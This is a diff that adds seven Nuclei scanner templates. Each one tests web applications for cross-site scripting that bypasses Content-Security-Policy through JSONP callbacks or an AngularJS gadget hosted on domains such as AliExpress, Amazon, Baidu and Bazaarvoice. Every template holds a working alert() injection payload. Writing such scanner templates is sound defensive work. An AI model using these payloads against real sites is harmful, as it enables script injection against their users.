projectdiscovery · DhiyaneshGeek · Jan 24, 2025 · Jan 27, 2025 · Jan 27, 2025 · Jan 27, 2025
diff --git a/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: 1688-bebezoo-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via 1688 Bebezoo
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,1688
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: bebezoo_1688_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "bebezoo_1688_csp_xss == true" 
diff --git a/dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: aliexpress-acs-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via AliExpress ACS
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,aliexpress
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://acs.aliexpress.com/h5/mtop.aliexpress.address.shipto.division.get/1.0/?type=jsonp&dataType=jsonp&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: aliexpress_acs_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "aliexpress_acs_csp_xss == true" 
diff --git a/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: amazon-aax-eu-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Amazon AAX EU
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,amazon
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://aax-eu.amazon.com/e/xsp/getAdj?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: amazon_aax_eu_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "amazon_aax_eu_csp_xss == true" 
diff --git a/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml b/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: app-link-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via App Link
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,app
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://app.link/_r?sdk=web&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: app_link_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "app_link_csp_xss == true" 
diff --git a/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: baidu-map-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Baidu Map API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,baidu
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.map.baidu.com/api?v=2.0&ak=&s=1&callback=alert(document.domain)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: baidu_map_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "baidu_map_api_csp_xss == true" 
diff --git a/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: bazaarvoice-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Bazaarvoice API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,bazaarvoice
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.bazaarvoice.com/data/batch.json?passkey=e75powr7wqhg1ah5seu00zawf&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: bazaarvoice_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "bazaarvoice_api_csp_xss == true" 
diff --git a/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: bdimg-apps-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via BDIMG Apps
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,bdimg
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: bdimg_apps_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "bdimg_apps_csp_xss == true"